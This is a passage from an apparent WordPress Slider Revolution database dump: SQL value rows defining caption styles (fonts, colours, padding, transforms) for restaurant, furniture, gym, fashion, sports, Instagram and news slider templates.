(51,'.tp-caption.Restaurant-ScrollDownText','{\"hover\":\"false\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\"}','{\"idle\":{\"letter-spacing\":\"2px\"},\"hover\":\"\"}','{\"color\":\"#ffffff\",\"font-size\":\"17px\",\"line-height\":\"17px\",\"font-weight\":\"400\",\"font-style\":\"normal\",\"font-family\":\"Roboto\",\"padding\":[\"0\",\"0\",\"0\",\"0\"],\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}'),
(52,'.tp-caption.Restaurant-Description','{\"hover\":\"false\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\"}','{\"idle\":{\"letter-spacing\":\"3px\"},\"hover\":\"\"}','{\"color\":\"#ffffff\",\"font-size\":\"20px\",\"line-height\":\"30px\",\"font-weight\":\"300\",\"font-style\":\"normal\",\"font-family\":\"Roboto\",\"padding\":[\"0\",\"0\",\"0\",\"0\"],\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}'),
(53,'.tp-caption.Restaurant-Price','{\"hover\":\"false\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\"}','{\"idle\":{\"letter-spacing\":\"3px\"},\"hover\":\"\"}','{\"color\":\"#ffffff\",\"font-size\":\"30px\",\"line-height\":\"30px\",\"font-weight\":\"300\",\"font-style\":\"normal\",\"font-family\":\"Roboto\",\"padding\":[\"0\",\"0\",\"0\",\"0\"],\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}'),
(54,'.tp-caption.Restaurant-Menuitem','{\"hover\":\"false\",\"type\":\"text\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#000000\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"#ffffff\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"pointer_events\":\"auto\",\"css_cursor\":\"pointer\",\"speed\":\"500\",\"easing\":\"power2.inOut\"}','{\"idle\":{\"letter-spacing\":\"2px\"},\"hover\":\"\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"17px\",\"line-height\":\"17px\",\"font-weight\":\"400\",\"font-style\":\"normal\",\"font-family\":\"Roboto\",\"padding\":[\"10px\",\"30px\",\"10px\",\"30px\"],\"text-decoration\":\"none\",\"text-align\":\"left\",\"background-color\":\"#000000\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"parallax\":\"-\"}'),
(55,'.tp-caption.Furniture-LogoText','{\"hover\":\"false\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"speed\":\"0\",\"easing\":\"none\"}','{\"idle\":{\"text-shadow\":\"none\"},\"hover\":\"\"}','{\"color\":\"#e6cfa3\",\"color-transparency\":\"1\",\"font-size\":\"160px\",\"line-height\":\"150px\",\"font-weight\":\"300\",\"font-style\":\"normal\",\"font-family\":\"\\\"Raleway\\\"\",\"padding\":[\"0\",\"0\",\"0\",\"0\"],\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}'),
(56,'.tp-caption.Furniture-Plus','{\"hover\":\"false\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"#000000\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"30px\",\"30px\",\"30px\",\"30px\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"speed\":\"0.5\",\"easing\":\"none\"}','{\"idle\":{\"text-shadow\":\"none\",\"box-shadow\":\"rgba(0,0,0,0.1) 0 1px 3px\"},\"hover\":\"\"}','{\"color\":\"#e6cfa3\",\"color-transparency\":\"1\",\"font-size\":\"20\",\"line-height\":\"20px\",\"font-weight\":\"400\",\"font-style\":\"normal\",\"font-family\":\"\\\"Raleway\\\"\",\"padding\":[\"6px\",\"7px\",\"4px\",\"7px\"],\"text-decoration\":\"none\",\"background-color\":\"#ffffff\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"30px\",\"30px\",\"30px\",\"30px\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}'),
(57,'.tp-caption.Furniture-Title','{\"hover\":\"false\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"speed\":\"0\",\"easing\":\"none\"}','{\"idle\":{\"text-shadow\":\"none\",\"letter-spacing\":\"3px\"},\"hover\":\"\"}','{\"color\":\"#000000\",\"color-transparency\":\"1\",\"font-size\":\"20px\",\"line-height\":\"20px\",\"font-weight\":\"700\",\"font-style\":\"normal\",\"font-family\":\"\\\"Raleway\\\"\",\"padding\":[\"0\",\"0\",\"0\",\"0\"],\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}'),
(58,'.tp-caption.Furniture-Subtitle','{\"hover\":\"false\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"speed\":\"0\",\"easing\":\"none\"}','{\"idle\":{\"text-shadow\":\"none\"},\"hover\":\"\"}','{\"color\":\"#000000\",\"color-transparency\":\"1\",\"font-size\":\"17px\",\"line-height\":\"20px\",\"font-weight\":\"300\",\"font-style\":\"normal\",\"font-family\":\"\\\"Raleway\\\"\",\"padding\":[\"0\",\"0\",\"0\",\"0\"],\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}'),
(59,'.tp-caption.Gym-Display','{\"hover\":\"false\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"speed\":\"0\",\"easing\":\"none\"}','{\"idle\":\"\",\"hover\":\"\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"80px\",\"line-height\":\"70px\",\"font-weight\":\"900\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":[\"0\",\"0\",\"0\",\"0\"],\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}'),
(60,'.tp-caption.Gym-Subline','{\"hover\":\"false\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"speed\":\"0\",\"easing\":\"none\"}','{\"idle\":{\"letter-spacing\":\"5px\"},\"hover\":\"\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"30px\",\"line-height\":\"30px\",\"font-weight\":\"100\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":[\"0\",\"0\",\"0\",\"0\"],\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}'),
(61,'.tp-caption.Gym-SmallText','{\"hover\":\"false\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"speed\":\"0\",\"easing\":\"none\"}','{\"idle\":{\"text-shadow\":\"none\"},\"hover\":\"\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"17px\",\"line-height\":\"22\",\"font-weight\":\"300\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":[\"0\",\"0\",\"0\",\"0\"],\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}'),
(62,'.tp-caption.Fashion-SmallText','{\"hover\":\"false\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"speed\":\"0\",\"easing\":\"none\"}','{\"idle\":{\"letter-spacing\":\"2px\"},\"hover\":\"\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"12px\",\"line-height\":\"20px\",\"font-weight\":\"600\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":[\"0\",\"0\",\"0\",\"0\"],\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}'),
(63,'.tp-caption.Fashion-BigDisplay','{\"hover\":\"false\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"speed\":\"0\",\"easing\":\"none\"}','{\"idle\":{\"letter-spacing\":\"2px\"},\"hover\":\"\"}','{\"color\":\"#000000\",\"color-transparency\":\"1\",\"font-size\":\"60px\",\"line-height\":\"60px\",\"font-weight\":\"900\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":[\"0\",\"0\",\"0\",\"0\"],\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}'),
(64,'.tp-caption.Fashion-TextBlock','{\"hover\":\"false\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"speed\":\"0\",\"easing\":\"none\"}','{\"idle\":{\"letter-spacing\":\"2px\"},\"hover\":\"\"}','{\"color\":\"#000000\",\"color-transparency\":\"1\",\"font-size\":\"20px\",\"line-height\":\"40px\",\"font-weight\":\"400\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":[\"0\",\"0\",\"0\",\"0\"],\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}'),
(65,'.tp-caption.Sports-Display','{\"translated\":5,\"type\":\"text\",\"version\":\"5.0\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"speed\":\"0\",\"easing\":\"none\"}','{\"idle\":{\"letter-spacing\":\"13px\"},\"hover\":\"\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"130px\",\"line-height\":\"130px\",\"font-weight\":\"100\",\"font-style\":\"normal\",\"font-family\":\"\\\"Raleway\\\"\",\"padding\":\"0 0 0 0\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":\"0 0 0 0\",\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}'),
(66,'.tp-caption.Sports-DisplayFat','{\"translated\":5,\"type\":\"text\",\"version\":\"5.0\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"speed\":\"0\",\"easing\":\"none\"}','{\"idle\":[\"\"],\"hover\":\"\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"130px\",\"line-height\":\"130px\",\"font-weight\":\"900\",\"font-style\":\"normal\",\"font-family\":\"\\\"Raleway\\\"\",\"padding\":\"0 0 0 0\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":\"0 0 0 0\",\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}'),
(67,'.tp-caption.Sports-Subline','{\"translated\":5,\"type\":\"text\",\"version\":\"5.0\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"speed\":\"0\",\"easing\":\"none\"}','{\"idle\":{\"letter-spacing\":\"4px\"},\"hover\":\"\"}','{\"color\":\"#000000\",\"color-transparency\":\"1\",\"font-size\":\"32px\",\"line-height\":\"32px\",\"font-weight\":\"400\",\"font-style\":\"normal\",\"font-family\":\"\\\"Raleway\\\"\",\"padding\":\"0 0 0 0\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":\"0 0 0 0\",\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}'),
(68,'.tp-caption.Instagram-Caption','{\"hover\":\"false\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"speed\":\"0\",\"easing\":\"none\"}','{\"idle\":\"\",\"hover\":\"\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"20px\",\"line-height\":\"20px\",\"font-weight\":\"900\",\"font-style\":\"normal\",\"font-family\":\"Roboto\",\"padding\":[\"0\",\"0\",\"0\",\"0\"],\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}'),
(69,'.tp-caption.News-Title','{\"hover\":\"false\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"speed\":\"0\",\"easing\":\"none\"}','{\"idle\":\"\",\"hover\":\"\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"70px\",\"line-height\":\"60px\",\"font-weight\":\"400\",\"font-style\":\"normal\",\"font-family\":\"Roboto Slab\",\"padding\":[\"0\",\"0\",\"0\",\"0\"],\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}'),
